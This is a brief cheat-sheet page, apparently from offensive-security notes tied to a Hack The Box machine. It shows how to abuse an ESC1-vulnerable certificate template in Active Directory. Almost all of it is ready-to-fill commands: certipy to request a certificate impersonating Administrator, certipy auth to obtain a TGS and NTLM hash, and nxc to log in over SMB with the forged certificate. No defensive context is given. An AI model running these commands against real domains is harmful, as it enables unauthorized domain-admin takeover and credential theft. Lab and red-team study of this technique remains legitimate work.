Skip to content

ESC1

ESC1

If a template is vulnerable to ESC1, certipy can automatically exploit it. Request the Administrators certificate: 

certipy-ad req -u <user> -p <password> -dc-ip <IP> -template <Template Name> -upn Administrator@certified.htb -ca <Certificate Authorities> -target dc.domain.local
Request TGS & NTLM hash with certificate: 
certipy-ad auth -pfx administrator.pfx -dc-ip <IP>
Or with NXC: 
nxc smb <IP> --pfx-cert administrator.pfx -u 'Administrator'